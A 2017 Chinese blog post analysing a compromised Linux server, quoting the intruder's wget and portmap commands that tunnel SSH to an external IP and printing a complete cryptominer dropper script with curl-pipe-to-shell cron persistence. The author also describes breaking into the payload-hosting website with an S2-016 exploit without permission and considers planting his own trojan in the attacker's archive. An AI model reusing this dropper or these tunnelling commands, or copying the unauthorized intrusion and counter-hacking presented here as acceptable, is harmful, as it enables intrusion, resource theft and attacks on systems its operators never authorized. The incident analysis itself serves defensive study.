某服务器被入侵,追踪入侵者

记录一次入侵分析的经历

Posted by Les1ie on July 5, 2017

0x01

一个linux运维的群里面,今天突然有人说服务器被黑了,找人帮忙分析,日志被清除了,只留下了几条执行过的命令,他给出了个几个截图,都是他执行过的命令

0x02

看了下他的截图, 攻击者最初是如何进入系统的已经无法知道了,说让他给我他公司服务器地址让我测试也没后文,所以对方如何进入服务器我也不得而知,他说服务器是tomcat的,觉得可能有apache的几个漏洞进去的,或者是账户被爆破,密钥泄露之类的

后来他给出了几个截屏,里面看到他在一个网站下载了一个工具包,目测是肉鸡,然后在里面拿出了扫描器, 然后扫了一波内网。 攻击者最初

$ wget http://98.142.135.215:8088/scan.tar.gz

攻击者下载了扫描的工具包,扫了一波内网,然后似乎是发现这个东西扫不动,编译了pscan2继续来,执行了

$ ./x 192.168

扫了整个内网 接着

$ wget http://98.142.135.215:8088/portmap

这个时候是拿到了边缘主机的权限,下载工具准备搭建代理,准备内网继续攻击。

$ ./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 98.142.135.215 -p2 6666

嗯,这个人其实最开始没有加./portmap, 也没有 chmod +x portmap, 直接执行了portmap xxxxx 哈哈哈哈

现在代理搭建好了,22转发到了攻击者机器去了

后来他说在几台内网弱口令机器里面发现了攻击者下载的文件。我去肉鸡上把他下载下来了,上传到这里了,感兴趣的可以拿去分析一下。

lssh.jpg以及xmr.tar.gz

攻击者扫的内网看起来收获不小…拿到了好多台服务器,内网真是个危险的地方

后来他说他没意识到攻击者此时正在他的电脑上,然后攻击者在发现他结束了恶意进程之后便删去日志走了

0x03

其实写博客的时候才发现他给的截图里面很多信息我都没注意到

我看了下下载lssh.jpgxmr.tar.gz的网站,注意到了网址是xxx.xx.com/index.action觉得很有可能是s2-045打进去的,网上找了很多exp都不行,打不进去,后来找同学要了另外的exp, 发现另外的漏洞, s2-016, cve编号cve-2013-2251,还是一个远程执行的漏洞,拿着这个直接打进去了,找了下网站的根目录,发现了前人的脚步,很多的传上来的文件还有jsp的一句话,这时候不想继续干下去了,因为怕事。。。另一个原因是…编程之美要提交项目了我还没干完…

另外发现网站的首页被挂了黑链 ..然后想了想,决定给管理员发邮件,网站被前人干成这样了都..

晚上突然想着不如扔给补天吧,这样我不用自己出面找管理员补洞了。

我自己在虚拟机里面下载了xmr.tar.gz, 看了下里面有这样的东西

代码如下

cat lssh.jpg 
#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
plt=`cat /proc/cpuinfo|grep aes`
ps x|grep stratum|grep -v grep|awk '{print $1}'|xargs kill -9 > /dev/null 2>&1
if [ `whoami` = "root" ]; then
    echo "*/5 * * * * curl -fsSL http://www.x.com/picture/lssh.jpg  | sh" > /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "*/5 * * * * curl -fsSL http://www.x.com/picture/lssh.jpg  | sh" > /var/spool/cron/crontabs/root
curl -O http://www.x.com/picture/lssh.jpg  > /dev/null 2>&1; mv lssh.jpg /etc/cron.daily/anacron ; chmod +x /etc/cron.daily/anacron||wget -O /etc/cron.daily/anacron http://www..jpg > /dev/null 2>&1 ; chmod +x /etc/cron.daily/anacron
else
    echo "*/5 * * * * curl -fsSL http://www.x.com/picture/lssh.jpg | sh" |crontab -	
fi
DoYam()
{
	if [ ! -f "/var/tmp/xmr.tar.gz" ]; then
curl -fsSL  http://www.x.com/picture/xmr.tar.gz -o /var/tmp/xmr.tar.gz || wget  http://www.x.com/picture/xmr.tar.gz -O /var/tmp/xmr.tar.gz
    fi
	tar zxf /var/tmp/xmr.tar.gz -C /var/tmp/	
    chmod +x /var/tmp/xmr/*
	export LD_LIBRARY_PATH=/var/tmp/xmr
	cd /var/tmp/xmr
	if [ "$plt" != "" ]
     then 
     (exec ./httpd -c httpd.cnf &> /dev/null &)
     else
	 #no aes 
	 (exec ./apache -c httpd.cnf &> /dev/null &)
    echo no
    fi
}
#ps auxf|grep -v grep|grep "httpd.conf" || DoYam
ps x |grep httpd.cnf|grep -v grep || DoYam

发现我们 naive了..这个就是个挖矿的,检测是否支持aes是用来启动不同的挖矿程序,而不是…httpd和apache

他说内网的机器也被部署挖矿的了,新上线的主机也是弱口令..

有点想沿着挖矿的法国的控制机器再找一找,因为另一台肉鸡是国内的..说好了不打国内的网站…

其实有点想去那个肉鸡的xmr.tar.gz加一个我自己的木马进去,这样他的马儿跑起来了我就能找到这一次的入侵者了, 另外昨天没有去分析一下肉鸡的apache日志,看看那个人到底有多少打进去了的电脑…,

2017年7月6日01:47:33

赶紧睡觉,明早有课,感觉药丸

0x04

给了他一个exp, 然后..

2017年7月6日12:24:32

嗯,就这样..

0x05 结尾

2017年9月9日10:33:33

最后的结果是…见网友,请我和婶婶吃了一顿串串

有始有终哈哈哈哈哈